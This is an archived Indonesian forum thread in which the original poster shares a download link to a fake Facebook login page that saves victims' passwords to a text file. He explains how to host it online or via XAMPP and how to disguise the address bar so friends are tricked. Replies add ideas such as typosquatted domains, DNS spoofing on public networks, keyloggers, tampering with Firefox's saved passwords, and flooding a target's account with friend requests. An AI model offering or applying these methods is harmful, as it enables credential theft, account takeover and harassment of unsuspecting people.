PDA

View Full Version : Hack facebook temen dengan script



TqT
27-11-2009, 01:24 PM
Mungkin sekarang ada yang sedang marah - marah karena software - software yang katanya bisa buat hack FB ternyata ga bisa :awas: seperti saya :panda:

Tapi aku punya cara sendiri buat hack account temen2 aku :piss:

ini buatan ane sendiri kok :top:

Download aja file di bawah nie
Script Facebook
http://www.ziddu.com/download/7518141/scriptfakeloginFacebook.rar.html
o ya nanti buat dulu file "passwords.txt" ya, kalo ga, ga bisa jalan

XAMPP 1.72 (kayaknya sih latest :???:)
upload IDWS ga bisa ziddu error mulu :swt: bagi yang tidak sabar cari ndiri aja yah, ntar q usahain upload lagi, tapi tadi udah 67% gagal lagi :swt:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html


Ada 2 cara buat boongin temen pake script nie :boong:
1. upload di website
cara ini agak susah dan belom temen kita tentu ketipu :swt: karena address barnya kan bukan facebook.com:panda: biasanya saya menipu temen dengan cara begini, kita upload, script palsu misalnya urlnya www.palsu.com, maka setelah kita upload kita ganti di address bar www.facebook.com (JANGAN DI ENTER)
nanti temen kita liadnya kan di address bar nya www.facebook.com :hahai:

2. pake xampp
pertama masukin, misalkan folder "palsu"
tinggal kita pake xampp ketik localhost/palsu
otomatis buka deh, tinggal address bar nya diganti kaya cara di atas(no 1) :hahai:

Selamat mencoba sori kalo repost :piss:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: http://www.ziddu.com/download/7529842/h.fb.docx.htm

langsakers
27-11-2009, 01:30 PM
Mungkin sekarang ada yang sedang marah - marah karena software - software yang katanya bisa buat hack FB ternyata ga bisa :awas: seperti saya :panda:

Tapi aku punya cara sendiri buat hack account temen2 aku :piss:

Download aja file di bawah nie



o ya nanti buat dulu file passwords.txt ya, kalo ga, ga bisa jalan
Ada 2 cara buat boongin temen pake script nie :boong:

1. upload di website
cara ini agak susah dan belom temen kita tentu ketipu :swt: karena address barnya kan bukan facebook.com:panda: biasanya saya menipu temen dengan cara begini, kita upload, script palsu misalnya urlnya www.palsu.com, maka setelah kita upload kita ganti di address bar www.facebook.com (JANGAN DI ENTER)
nanti temen kita liadnya kan di address bar nya www.facebook.com :hahai:

2. pake xampp
pertama masukin, misalkan folder "palsu"
tinggal kita pake xampp ketik localhost/palsu
otomatis buka deh, tinggal address bar nya diganti kaya cara di atas(no 1) :hahai:

Selamat mencoba sori kalo repost :piss:



bro, ni semacam bikin phising gitu bukan c ??? ane pernah nyoba upload file phising di hosting gratisan eh malah dibanned ma hostingnyah....

btw, gua coba klik link yang lu blg gak boleh di klik, tapi gada apa2 kok, malah masuk ke home FB gua gt....

CMIIW :piss:

PertamaX ah...
:idws:

TqT
27-11-2009, 01:32 PM
bro, ni semacam bikin phising gitu bukan c ??? ane pernah nyoba upload file phising di hosting gratisan eh malah dibanned ma hostingnyah....

btw, gua coba klik link yang gak lu blg gak boleh di klik, tapi gada apa2 kok, malah masuk ke home FB gua gt....

CMIIW :piss:

PertamaX ah...
:idws:

Betul sekali, kalo klik login emang ga terjadi apa2, karena id dan pass udah masuk di file passwords.txt :hahai:
trus masalah diblok, itu pasti, soalnya phising kan kejahatan juga, makannya pake XAMPP... :boong:
lebih gampang n ga perlu daftar segala, bisa makenya ga :???:

Arnez
27-11-2009, 02:19 PM
ini semua termasuk xammpnya juga kan ???
ini yang dari kemaren ane cari :sembah::sembah:

TqT
27-11-2009, 03:42 PM
ini semua termasuk xammpnya juga kan ???
ini yang dari kemaren ane cari :sembah::sembah:

Duh maaph lom masuk :panik::panik::panik:
xampp nya bisa di donload sendiri di idws ato mo saya uploadin :???:

Dekalvin
27-11-2009, 05:21 PM
udah termasuk Xampp nya gag??

ThePuckals
27-11-2009, 05:52 PM
waduw,.,
masi ga mudeng.,
maklum nuebi.,hehe

jd ni bs dipake pada 1 komputer ato over the internet?
dan supaya temen kita bisa kita kerjain apakah kita harus mengarahkan dy untuk membuka script yg kita masukan ato kita hack ?
ato hanya semisal dy pinjem komputer kita baru ni script bekerja gitu??
mohon pencerahannya.,

keegan
27-11-2009, 05:54 PM
link ny ko eror sih om?

sanngtimur
27-11-2009, 11:27 PM
hohoho.. fake login rupanya.
met nyebar jebakan aja dah..
klo dpt bagi-bagi ya.. :piss:

zagayo
28-11-2009, 01:45 AM
hmm brarti ni semacam source page home nya FB yaa..

aconkz
28-11-2009, 02:28 AM
Ribet jg ya..:hot: ini kan sama aja kaya pakai keylogger kan?! Cara kerjanya sama cuma ini bisa dipake dikomputer mana aja yang terhubung ke jaringan internet karena nanti yang dipakai bukan dari url facebooknya melainkan yang kita buat di xamp, kecuali keylogger hanya bisa dipakai di komputer yang sudah diinstal.. kalo gw sih milih pake keylogger soalnya udah banyak yang kena dan juga gampang dipakai dan ga pake ribet..:hahai::hahai:

jig_saw86
28-11-2009, 03:20 AM
sorry Q sm skali g paham. maklum user baru. tolong jelasin yg sejelas2nya. xampp itu apa Q jg g ngerti. cara buat script ky gmn jg g paham. payah bgt yah? skali lg maaf

me_ave
28-11-2009, 08:31 AM
sepertinya perlu ditambah di judul- threadnya :idwspiss:
[ADVANCED TIPS-NON PEMULA]
soalnya yang masih putih bakalan geleng-geleng ngelihat kata-kata xampp, dikirain amplifier lagi :haha:

undead098
28-11-2009, 08:41 AM
ini sih musti di komputer target.... g isa hek secara luas^^

TqT
28-11-2009, 12:32 PM
udah termasuk Xampp nya gag??
Belum, :swt: yah biz ni saya uploadin deh:piss:


link ny ko eror sih om?
Masa :???:


waduw,.,
masi ga mudeng.,
maklum nuebi.,hehe

jd ni bs dipake pada 1 komputer ato over the internet?
dan supaya temen kita bisa kita kerjain apakah kita harus mengarahkan dy untuk membuka script yg kita masukan ato kita hack ?
ato hanya semisal dy pinjem komputer kita baru ni script bekerja gitu??
mohon pencerahannya.,

Kalo diupload bisa over internet, tapi kalo ales bisa pake XAMPP ajah :lol:

TqT
28-11-2009, 12:39 PM
hohoho.. fake login rupanya.
met nyebar jebakan aja dah..
klo dpt bagi-bagi ya.. :piss:
:haha:


hmm brarti ni semacam source page home nya FB yaa..
bukan semacem lagi kk :haha:


Ribet jg ya..:hot: ini kan sama aja kaya pakai keylogger kan?! Cara kerjanya sama cuma ini bisa dipake dikomputer mana aja yang terhubung ke jaringan internet karena nanti yang dipakai bukan dari url facebooknya melainkan yang kita buat di xamp, kecuali keylogger hanya bisa dipakai di komputer yang sudah diinstal.. kalo gw sih milih pake keylogger soalnya udah banyak yang kena dan juga gampang dipakai dan ga pake ribet..:hahai::hahai:
yah hampir sama sih, tapi kalo keylogger kan kita kudu install, repot dan belom lagi kalo ketauan :swt:
kalo ini sih kemungkinan ketahuan kecil (kecuali lo pakenya ke bill gates :haha:


sorry Q sm skali g paham. maklum user baru. tolong jelasin yg sejelas2nya. xampp itu apa Q jg g ngerti. cara buat script ky gmn jg g paham. payah bgt yah? skali lg maaf
gapapa namanya juga belajar, ntar saya uploadin tutorialnya :top:


sepertinya perlu ditambah di judul- threadnya :idwspiss:
[ADVANCED TIPS-NON PEMULA]
soalnya yang masih putih bakalan geleng-geleng ngelihat kata-kata xampp, dikirain amplifier lagi :haha:
:haha: bener juga, tar gw buatin tutorialnya deh


ini sih musti di komputer target.... g isa hek secara luas^^

Asal di upload bisa sih :piss: tinggal pinter pintter kamu aja buat bohongin temen :awas:

kingzzz
28-11-2009, 02:00 PM
mana kk Xampp nya .. ditunggu ya ^^

TqT
28-11-2009, 02:06 PM
mana kk Xampp nya .. ditunggu ya ^^

Upload di IDWS kaga bisa :panda:
Upload di ziddu error :hulk: :panik::panik::panik:
Sabar ya :piss::piss:

evancode
28-11-2009, 02:52 PM
@TS
ajarin juga donk metode soceng-nya secara luas, masa yg kena jebakan cuma org yg pake komputer itu doang, gak seru ahh..
tapi biasanya awam masih suka kena sih pake cara2 beginian.
dan
gak perlu bikin file password.txt soalnya udah kebikin otomatis klo belum ada.

@all yg nanyain xampp
kan xampp gratis, donlot aja langsung dari websitenya
http://www.apachefriends.org/en/xampp.html

theadods
28-11-2009, 03:00 PM
ini teknik phising ya boss... mengelabui user dengan alamat palsu :haha:

caranya sih sebenernya simple buat aja tampilan yang mirip sama fesbuk, pasang kyk cara diatas, yang tahu php pasti bisa bikinnya

evancode
28-11-2009, 03:04 PM
ini teknik phising ya boss... mengelabui user dengan alamat palsu :haha:

caranya sih sebenernya simple buat aja tampilan yang mirip sama fesbuk, pasang kyk cara diatas, yang tahu php pasti bisa bikinnya
bener tuh, pake cara sosial enginering buat ngelabuhin pengguna lain (yg awam khususnya) klo mau lebih advance lagi sih bikin aja alamat website yg mirip2 macem faebook.com atau facebok.com atau facbook.com, lalu berdoa berharap ada yg teledor ngetik alamat website trs gak liat2 lagi alias main isi aja loginnya.

TqT
28-11-2009, 03:18 PM
@TS
ajarin juga donk metode soceng-nya secara luas, masa yg kena jebakan cuma org yg pake komputer itu doang, gak seru ahh..
tapi biasanya awam masih suka kena sih pake cara2 beginian.
dan
gak perlu bikin file password.txt soalnya udah kebikin otomatis klo belum ada.

@all yg nanyain xampp
kan xampp gratis, donlot aja langsung dari websitenya
http://www.apachefriends.org/en/xampp.html

Oke ntar aku coba dulu cari infonya :hero:


ini teknik phising ya boss... mengelabui user dengan alamat palsu :haha:

caranya sih sebenernya simple buat aja tampilan yang mirip sama fesbuk, pasang kyk cara diatas, yang tahu php pasti bisa bikinnya

yap emang phising tepat sekali :awas: emang bener banyak yang bikin www.facbook.com dll ituh,
tapi kebanyakan cepet banget lgsg diblokir:panda:
lagian sekarang kan jarang juga pada buka facebook ketik www.facebook.com, kebanyakan kan udah di bookmark/history langsung:panik:
CMIIW :piss:

twobi
29-11-2009, 12:20 AM
Mungkin sekarang ada yang sedang marah - marah karena software - software yang katanya bisa buat hack FB ternyata ga bisa :awas: seperti saya :panda:

Tapi aku punya cara sendiri buat hack account temen2 aku :piss:

Download aja file di bawah nie
Script Facebook
http://www.ziddu.com/download/7518141/scriptfakeloginFacebook.rar.html
o ya nanti buat dulu file "passwords.txt" ya, kalo ga, ga bisa jalan

XAMPP 1.72 (kayaknya sih latest :???:)
upload IDWS ga bisa ziddu error mulu :swt: bagi yang tidak sabar cari ndiri aja yah, ntar q usahain upload lagi, tapi tadi udah 67% gagal lagi :swt:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html


Ada 2 cara buat boongin temen pake script nie :boong:
1. upload di website
cara ini agak susah dan belom temen kita tentu ketipu :swt: karena address barnya kan bukan facebook.com:panda: biasanya saya menipu temen dengan cara begini, kita upload, script palsu misalnya urlnya www.palsu.com, maka setelah kita upload kita ganti di address bar www.facebook.com (JANGAN DI ENTER)
nanti temen kita liadnya kan di address bar nya www.facebook.com :hahai:

2. pake xampp
pertama masukin, misalkan folder "palsu"
tinggal kita pake xampp ketik localhost/palsu
otomatis buka deh, tinggal address bar nya diganti kaya cara di atas(no 1) :hahai:

Selamat mencoba sori kalo repost :piss:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html

brarti kalo mau tau password si korban..mreka harus login dari komputer kita dduunnggg

tussar01
29-11-2009, 04:54 AM
tHANKS YEAR .....

oniexs
29-11-2009, 05:48 AM
ah kalo genean ma gampang ajah...

tinggal reset password balik deh hohohohoho

0341_Plat_N
29-11-2009, 01:22 PM
neh phising pa fake login sih???
yg udah berhasil di tampilin donk hasilnya..
hehhee

cawfans
29-11-2009, 01:54 PM
tengkiu 4 sharing..
praktekin ahh

Valandrill
29-11-2009, 01:56 PM
berarti ini cm bisa dilakukan di komputer sharing kyk warnet yah?
klo lewat net gak bisa yah?

TqT
29-11-2009, 07:30 PM
brarti kalo mau tau password si korban..mreka harus login dari komputer kita dduunnggg
ngga juga, dipasang di kompi lain juga bisa


ah kalo genean ma gampang ajah...

tinggal reset password balik deh hohohohoho
Kalo masalah reset mah :swt: kalo kita udah ngerti password email juga bisa direset kan:awas: semua juga bisa direset bro :boong:


neh phising pa fake login sih???
yg udah berhasil di tampilin donk hasilnya..
hehhee
di tutorial saya udah saya tampilin gimana kao berhasil.. hehe :piss:


berarti ini cm bisa dilakukan di komputer sharing kyk warnet yah?
klo lewat net gak bisa yah?
kalo lewat net yah harus di upload :hot:

shoulang
29-11-2009, 08:07 PM
mw dicoba dulu
thanks bro :hehe:

0341_Plat_N
29-11-2009, 08:26 PM
di tutorial saya udah saya tampilin gimana kao berhasil.. hehe :piss:
walakakka...
ane kagak nyoba..
ga suka.. n males..
FB pnya orang2 indonesia ga ada manfaatnya
hehe :P
:piss::piss:

TqT
29-11-2009, 09:16 PM
walakakka...
ane kagak nyoba..
ga suka.. n males..
FB pnya orang2 indonesia ga ada manfaatnya
hehe :P
:piss::piss:

:hahai:
setubuh... :awas:
emang cuman buat ngerjain temen aja:piss:

0341_Plat_N
30-11-2009, 05:58 AM
:hahai:
setubuh... :awas:
emang cuman buat ngerjain temen aja:piss:
wokokok...
kalo mau ngerjain tmen.,..
mending di friend bomber aja FBnya
jahhaa..
atau kalo ga gt ikutkan emaol tmen lo di groub2 yg bisa meng-add fb orang.. misal untuk game atau untuk apa..
alhasil dia bakalan kena beribu2 friend request.. hiiihi...
:hahai::hahai::hahai:

lordcadaz
30-11-2009, 10:05 AM
Bisa Hack FB Cew Gw Neh :hahai:

muslie
30-11-2009, 11:57 AM
kl selaen FB,,bisa apa lagi bro?? kali2 aja email ato forum2 gitu,,

rky3prince
30-11-2009, 12:03 PM
kayaknya asyik neh buat ngerjain cew ane :top:

TqT
30-11-2009, 04:44 PM
wokokok...
kalo mau ngerjain tmen.,..
mending di friend bomber aja FBnya
jahhaa..
atau kalo ga gt ikutkan emaol tmen lo di groub2 yg bisa meng-add fb orang.. misal untuk game atau untuk apa..
alhasil dia bakalan kena beribu2 friend request.. hiiihi...
:hahai::hahai::hahai:
:haha: kejam amat :panda:
kasian dong:piss:


Bisa Hack FB Cew Gw Neh :hahai:
:hahai: cewek sendiri juga


kl selaen FB,,bisa apa lagi bro?? kali2 aja email ato forum2 gitu,,
ga bisa, ini emang scriptnya khusus FB, jadi kalo mau yang laen beda scriptnya... :rokok:


kayaknya asyik neh buat ngerjain cew ane :top:
:hahai: ini sama juga kok pada seneng ngerjain ceweknya yah :hot:

gogoamigo
30-11-2009, 05:57 PM
ya nie buat ngerjain cewe, FB mulu kerjaan nya.. tapi ane ga ngerti ini caranya bigi mana

Kazuya777
30-11-2009, 06:15 PM
wee keren nih buat ngerjain temen2 biar ga boring, nice info gan... thanks :em0100:

valent666666
30-11-2009, 10:17 PM
ini kaya script injection gitu ya? kalo xampp 1.71 bisa ga bos ? di rumah pake yg lama soalnya..

die_must
30-11-2009, 10:29 PM
nice inpoh, thanks for sharing...tapi kalau ketangkep bisa kena UU ITE ngga ya,,,,

hihiihi

0341_Plat_N
30-11-2009, 10:29 PM
kl selaen FB,,bisa apa lagi bro?? kali2 aja email ato forum2 gitu,,
yah hampir sama kyaknya...

@tqt..
wkakak..
io.. aq klo benci sama orang wa gtuin..
hihi...
:P

zart_d
30-11-2009, 10:38 PM
Mungkin sekarang ada yang sedang marah - marah karena software - software yang katanya bisa buat hack FB ternyata ga bisa :awas: seperti saya :panda:

Tapi aku punya cara sendiri buat hack account temen2 aku :piss:

Download aja file di bawah nie
Script Facebook
http://www.ziddu.com/download/7518141/scriptfakeloginFacebook.rar.html
o ya nanti buat dulu file "passwords.txt" ya, kalo ga, ga bisa jalan

XAMPP 1.72 (kayaknya sih latest :???:)
upload IDWS ga bisa ziddu error mulu :swt: bagi yang tidak sabar cari ndiri aja yah, ntar q usahain upload lagi, tapi tadi udah 67% gagal lagi :swt:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html


Ada 2 cara buat boongin temen pake script nie :boong:
1. upload di website
cara ini agak susah dan belom temen kita tentu ketipu :swt: karena address barnya kan bukan facebook.com:panda: biasanya saya menipu temen dengan cara begini, kita upload, script palsu misalnya urlnya www.palsu.com, maka setelah kita upload kita ganti di address bar www.facebook.com (JANGAN DI ENTER)
nanti temen kita liadnya kan di address bar nya www.facebook.com :hahai:

2. pake xampp
pertama masukin, misalkan folder "palsu"
tinggal kita pake xampp ketik localhost/palsu
otomatis buka deh, tinggal address bar nya diganti kaya cara di atas(no 1) :hahai:

Selamat mencoba sori kalo repost :piss:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html

ngeri juga klo d hack,,hehehe:hero:

yazido
30-11-2009, 11:34 PM
udah ada yang berhasil?

kelana2112
30-11-2009, 11:38 PM
kasian yang dikerjai gan ...

stacatro
01-12-2009, 01:32 AM
wah nyobain ach hehehe

dulupi01
01-12-2009, 01:10 PM
Mungkin sekarang ada yang sedang marah - marah karena software - software yang katanya bisa buat hack FB ternyata ga bisa :awas: seperti saya :panda:

Tapi aku punya cara sendiri buat hack account temen2 aku :piss:

Download aja file di bawah nie
Script Facebook
http://www.ziddu.com/download/7518141/scriptfakeloginFacebook.rar.html
o ya nanti buat dulu file "passwords.txt" ya, kalo ga, ga bisa jalan

XAMPP 1.72 (kayaknya sih latest :???:)
upload IDWS ga bisa ziddu error mulu :swt: bagi yang tidak sabar cari ndiri aja yah, ntar q usahain upload lagi, tapi tadi udah 67% gagal lagi :swt:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html


Ada 2 cara buat boongin temen pake script nie :boong:
1. upload di website
cara ini agak susah dan belom temen kita tentu ketipu :swt: karena address barnya kan bukan facebook.com:panda: biasanya saya menipu temen dengan cara begini, kita upload, script palsu misalnya urlnya www.palsu.com, maka setelah kita upload kita ganti di address bar www.facebook.com (JANGAN DI ENTER)
nanti temen kita liadnya kan di address bar nya www.facebook.com :hahai:

2. pake xampp
pertama masukin, misalkan folder "palsu"
tinggal kita pake xampp ketik localhost/palsu
otomatis buka deh, tinggal address bar nya diganti kaya cara di atas(no 1) :hahai:

Selamat mencoba sori kalo repost :piss:

Tutorial
-Dari internet (kebanyakan lebih ke cara installnya) : http://www.ziddu.com/download/7529762/xampp.doc.html
-Buatan saya (udah jelas banget but tanpa cara nginstall) :haha: : http://www.ziddu.com/download/7529842/h.fb.docx.html



ini maksudnya semacam fake login ya??

TqT
01-12-2009, 04:14 PM
ini kaya script injection gitu ya? kalo xampp 1.71 bisa ga bos ? di rumah pake yg lama soalnya..
Bisa, bisa, yang penting xampp :hahai::hahai:



@tqt..
wkakak..
io.. aq klo benci sama orang wa gtuin..
hihi...
:P
:panda:kejam sekali:piss:
btw itu caranya ngewall di applikasi gitu :???:
bener ga?
hehe


udah ada yang berhasil?
Saya udah berhasil kuk, kalo ga berhasil kaga gw pos:hahai:


kasian yang dikerjai gan ...
Ya mesti:hot:


ini maksudnya semacam fake login ya??
:???: fake login? mungkin begitu bahasanya... haha

0341_Plat_N
01-12-2009, 09:58 PM
:panda:kejam sekali:piss:
btw itu caranya ngewall di applikasi gitu :???:
bener ga?
hehe
bukan ngewall di applikasi, tapi gni..
misal..
1 udah dapet email target...
2. join aja di groub yg misal "mau di add ribuan tmen", "di add ribuan tmen sehari", kalo game ada yg gni "groupis attack", dll lah intinya groub itu minta agar kita share email biar di add oleh orang lain,(biasanya lewat invite tool)
3. ngewall email korban di tengah2 list email orang2..
4. nikmatin aja deh.. mungkin dia bakal bt, tiap hari ada yg add.. bahkan ampe ribuan..
kalo misal di confirm semua n ngelebihi batas kuota friend FB. bisa di band tuh FBny target..
wkakaka..
gmna???
:piss::piss::piss:
aqmsh pmnya bnyak cara lain loh buat ngerjain orang yg mbuat aq marah..
hehee
:hahai::hahai::hahai::hahai::hahai:

TqT
05-12-2009, 08:00 AM
bukan ngewall di applikasi, tapi gni..
misal..
1 udah dapet email target...
2. join aja di groub yg misal "mau di add ribuan tmen", "di add ribuan tmen sehari", kalo game ada yg gni "groupis attack", dll lah intinya groub itu minta agar kita share email biar di add oleh orang lain,(biasanya lewat invite tool)
3. ngewall email korban di tengah2 list email orang2..
4. nikmatin aja deh.. mungkin dia bakal bt, tiap hari ada yg add.. bahkan ampe ribuan..
kalo misal di confirm semua n ngelebihi batas kuota friend FB. bisa di band tuh FBny target..
wkakaka..
gmna???
:piss::piss::piss:
aqmsh pmnya bnyak cara lain loh buat ngerjain orang yg mbuat aq marah..
hehee
:hahai::hahai::hahai::hahai::hahai:

owh gitu toh :hahai:
caranya :top: banget :hihi:
thx 4 share kk:piss:
btw cara lain nya apa :???:

TukangKebun
05-12-2009, 08:16 AM
menuju tkp dolo gan :tkp1::hmm:
btw :niceinfo:

agung242
05-12-2009, 08:20 AM
kalo ane sih gan udan ada cara jitu laen..
ubah script di mozilla firefox..
bikin remember, not now, sama never for this site ngesave password..
kena banyak dah di skull gw..
hahahaha...

wendy260990
05-12-2009, 08:23 AM
thanks kaka n ice share:piss:

oranggila
05-12-2009, 08:30 AM
Wew klo mau dapet pass barti tarik orangnya ke komputer kita dulu y kk?
klo mau d kompt orang ya mau g mau harus ada localhostnya tuh kompiex..!
CMIIW :piss:


kalo ane sih gan udan ada cara jitu laen..
ubah script di mozilla firefox..
bikin remember, not now, sama never for this site ngesave password..
kena banyak dah di skull gw..
hahahaha...

bisa di rubah yah script mozillanya
Gimana caranya tuh :???:

TqT
05-12-2009, 09:00 AM
kalo ane sih gan udan ada cara jitu laen..
ubah script di mozilla firefox..
bikin remember, not now, sama never for this site ngesave password..
kena banyak dah di skull gw..
hahahaha...
caranya:???:


Wew klo mau dapet pass barti tarik orangnya ke komputer kita dulu y kk?
klo mau d kompt orang ya mau g mau harus ada localhostnya tuh kompiex..!
CMIIW :piss:

betul, kalo di kompi laen kudu diupload dolo :top:

zhaky_gng
16-12-2009, 03:50 PM
Model phising ya nih?
Tapi berarti orangnya harus pake internet di komputer kita dong???
Betul ga? :???:

tenzen
24-12-2009, 09:18 PM
duh saya benci ziddu

benci sekali

vodkanovic
01-04-2010, 05:14 PM
kalo ane sih gan udan ada cara jitu laen..
ubah script di mozilla firefox..
bikin remember, not now, sama never for this site ngesave password..
kena banyak dah di skull gw..
hahahaha...

nah.. ide ak juga gt kk... mozinya kita script agar supaya bila diketik www.facebook.com/facebook.com makan munculah halaman facebook bikinan kita.

jadi maksudnya kita gabungin phising ama modifikasi script mozila... mantabh dah

cuma sayangnya,, ak cuma isa bikin phisingnya kyk gini (celengan.cilacaponline.web.id)

dan itu isanya dibuka ya lewat situ langsung..

maunya,ketika orang ketik facebook.com di browser firefox/opera/IE/google chrome dll,maka akan langsung mucul halaman itu

gimana ya cara gabunginnya?

cara ngrubah logika browser,biar facebook.com berarti web phising kita,, namun tampilan di navigation bar tetep facebook.com dan tidak menampilkan tautan phisingnya dan tidak menampilkan url2 yg diproses pada status bar


demikian sekedar ide aja,thanks infonya dan tutorialnya,, mari kita kembangkan

gimana gan,, ada yg isa?

rendy1287
01-04-2010, 06:06 PM
XAMPP cuma bisa buat temen deket doang yg di dunia nyata :madesu:

arkdevil
01-04-2010, 06:18 PM
:cihuy:




:tkp3:...........:tkp2:

nurhana
01-04-2010, 07:42 PM
nice info gan .............. coba coba dulu ah

kulocaki
01-04-2010, 07:43 PM
also known as phising... CMIIW

idwslovers
01-04-2010, 08:25 PM
HOAX jgn Percaya:swt:

TqT
27-10-2010, 06:11 PM
also known as phising... CMIIW

yap betul gan :peace:

TqT
27-10-2010, 06:12 PM
HOAX jgn Percaya:swt:

whaattt... :kaget:
kok bisa hoax gan :bingung:

skydragon
27-10-2010, 06:34 PM
Ini sih cara kurang kerjaan...:swt:
Cara yg dijelasin TS kan kita buka halaman fb palsu yg dipasang di XAMPP, bukanya pake localhost kan, dgn kata lain hanya bs dibuka di komp pembuat...:awas:
Kecuali TS konek ke inet n buka halamannya pake IP...

Lagian TS jg blg, buka halamannya trs ganti manual URLnya...
Rada ribet n hanya bs digunakan utk tmn sendiri (kan TS harus ganti urlnya, jadi pastinya TS kenal orangnya....:swt:)


Masih mending pake DNS spoofing, spoof di jaringan umum (kampus,mall, atau warnet) dptnya bs byk...Walaupun rada ribet...

skali lg...:swt:

dadans
28-10-2010, 10:22 AM
enakan keylogger aja, pasang di kompie kantor...:hahai:

ayic_acc
28-10-2010, 10:48 AM
i stealer lebih mantab

holando27
28-10-2010, 12:20 PM
waduhh...cmn buat ngambil passwordnya nih critanya...kalo cara lain ga ada yaah??misal kita jauh dr target

btw, aman2 aja kah thread ginian ??

descart
28-10-2010, 12:43 PM
enak pake autologin firefox :top:

uuk
28-10-2010, 06:03 PM
ga ah sob.
kasihan temen kita.
jaga privasinya.

aeruL
28-10-2010, 09:50 PM
kalo pake xampp artinya ini cuman buat localhost aja ath.... Wah.. Cuman bisa dibuka di komputer sendiri kalo ngga jaringan saja yah ?? CMIW :peace:

kakegaul
28-10-2010, 10:26 PM
mangkanya kalo FB harus d kompie ato hae punya sendiri jangan yang milik umum

n3xu5
28-10-2010, 10:35 PM
waduhh jarang bukaČ pacebook gan :hahai:
nti klo ada orang ngeselin ane tess :ehem:

karindra
01-11-2010, 04:23 PM
ho...intinya hampir sm kyk phising y...

yaudah kapan2 ane coba deh gan...

thx for share...

ImNotPro
02-11-2010, 02:35 AM
karena pake XAMPP berarti cuman buat kompie sendiri ya?
g bisa buat jaringan donk
mendingan pake keylogger aja daripada repot pake ini menurut gw
btw
:niceinfo:

n3xu5
02-11-2010, 10:29 AM
wa bahaya nh... untung buka dirumah aj :hahai:

TqT
12-11-2010, 01:20 PM
karena pake XAMPP berarti cuman buat kompie sendiri ya?
g bisa buat jaringan donk
mendingan pake keylogger aja daripada repot pake ini menurut gw
btw
:niceinfo:

sebenernya bisa, tapi kudu diupload gan... :peace:


Ini sih cara kurang kerjaan...:swt:
Cara yg dijelasin TS kan kita buka halaman fb palsu yg dipasang di XAMPP, bukanya pake localhost kan, dgn kata lain hanya bs dibuka di komp pembuat...:awas:
Kecuali TS konek ke inet n buka halamannya pake IP...

Lagian TS jg blg, buka halamannya trs ganti manual URLnya...
Rada ribet n hanya bs digunakan utk tmn sendiri (kan TS harus ganti urlnya, jadi pastinya TS kenal orangnya....:swt:)


Masih mending pake DNS spoofing, spoof di jaringan umum (kampus,mall, atau warnet) dptnya bs byk...Walaupun rada ribet...

skali lg...:swt:

ya maaf deh gan... saya kan cuman share aja... :swt:

rungga
12-11-2010, 01:37 PM
ini enaknya dipasang diwarnet atau jaringan LAN lab. hihihiii tapi ane mah ga minat deh coz cuman password fb sih, maunya password ATM, hihiiii. nice share untuk belajar web nih

TqT
12-11-2010, 05:33 PM
ini enaknya dipasang diwarnet atau jaringan LAN lab. hihihiii tapi ane mah ga minat deh coz cuman password fb sih, maunya password ATM, hihiiii. nice share untuk belajar web nih
Iya gan, sebenernya mungkin ada cara / teknik lain biar lebih bagus, tapi kayanya susah... :swt:


nice inpoh gan..menujuh tekapeh
OK gan... reviewnya ya kalo dah mencoba :peace:

zoleem
14-11-2010, 03:21 PM
Wah, ane ga demen ni yang kek ginian, kasian yang kena, bayangin klo ane sendiri yang kena, he5

adjie_doank
14-11-2010, 06:49 PM
Hmmmm apaan neh ya gak mudeng aku :peace:

TqT
18-11-2010, 06:52 PM
Wah, ane ga demen ni yang kek ginian, kasian yang kena, bayangin klo ane sendiri yang kena, he5

makanya jangan buat kejahatan gan... buat sekedar usil aja :peace:


Hmmmm apaan neh ya gak mudeng aku :peace:
buat hack facebook temen gan :peace:

azadinda
18-11-2010, 07:06 PM
Wah...wah bahaya ne pada hack fb orang, perlu jeli nich siapa tau pny gw ntar di hack :takut:
Kalo gitu gw pelajari dulu untuk mencegah fb gw dihack :TKP:

late_night
18-11-2010, 08:02 PM
Woooooiiii.... gan, link yng ==> http://www.ziddu.com/download/7518141/scriptfakeloginFacebook.rar.html gak bisa, cuma muter2 di adds aja. chapcaaaaaaaaaay deeeeeh

TqT
19-11-2010, 12:12 PM
Wah...wah bahaya ne pada hack fb orang, perlu jeli nich siapa tau pny gw ntar di hack :takut:
Kalo gitu gw pelajari dulu untuk mencegah fb gw dihack :TKP:
ok gan :top:


Woooooiiii.... gan, link yng ==> http://www.ziddu.com/download/7518141/scriptfakeloginFacebook.rar.html gak bisa, cuma muter2 di adds aja. chapcaaaaaaaaaay deeeeeh
Masa sih gan :???:
kalo gak bisa pun itu pasti masalah di ziddu nya gan, bukan dari saya...

huanghanzen
19-11-2010, 06:19 PM
ini mah sama aja kyk fising donk.... dikira hack ke databasenya FB

TqT
23-11-2010, 08:35 PM
waaaaaaah...
jail juga niiiiiih...
hha:panda:
kreatif gan lebih tepatnya :haha:


ini mah sama aja kyk fising donk.... dikira hack ke databasenya FB
kalo hack ke database fb gw share mah fb udah bangkrut gan :lol:

thaifansu
06-12-2010, 07:31 PM
linknya ko ga jalan seh om

gtXgaGe
07-12-2010, 12:58 PM
